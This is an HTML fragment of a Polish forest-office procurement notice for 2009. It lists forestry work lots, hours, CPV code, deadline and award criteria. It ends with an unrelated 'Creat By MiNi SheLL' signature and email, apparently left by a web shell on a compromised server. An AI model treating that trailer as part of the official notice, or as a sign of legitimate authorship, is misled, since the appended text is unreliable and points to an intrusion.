prace mechaniczne z zakresu zagospodarowania lasu (hodowla lasu, ochrona lasu, ochrona przyrody, ochrona p.poż, zadania budżetowe, remonty dróg leśnych, turystyka) w L-ctwach Świerzno i Chomino, katalogowe i nieskatalogowane; zakres prac 65 nh (normogodziny katalogowe),h (godz. zegarowe)
- pozyskanie drewna: 
prace ręczne z zakresu użytkowania lasu w L-ctwach Świerzno i Chomino, katalogowe i nieskatalogowane, wykonywane ręcznie lub ręcznie przy użyciu narzędzi mechanicznych, zakres prac 27384	nh (normogodziny katalogowe),h (godz. zegarowe)
- zrywka półpodwieszona:
prace mechaniczne, katalogowe, polegające na zrywce drewna W, S1, S3, M1. w L-ctwach Świerzno i Chomino; zakres prac 488 nh (normogodziny katalogowe)
- zrywka nasiębierna:
prace mechaniczne, katalogowe, polegające na nasiębiernej zrywce drewna S2, S4. w L-ctwach Świerzno i Chomino; zakres prac 3780 nh (normogodziny katalogowe)
- zrywka drewna 
prace godz. nieskatalogowane w L-ctwach Świerzno i Chomino; zakres prac 20 h (godz. zegarowe);
- prace transportowe; zakres prac 20 h (godz. zegarowe)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 10, PAD.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usługi z zakresu ochrony p.poż, obsługa punktu Alarmowo Dyspozycyjnego w siedzibie Nadleśnictwa Gryfice:
- Obsługa PAD - ryczałt miesięczny - 7 m-c..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com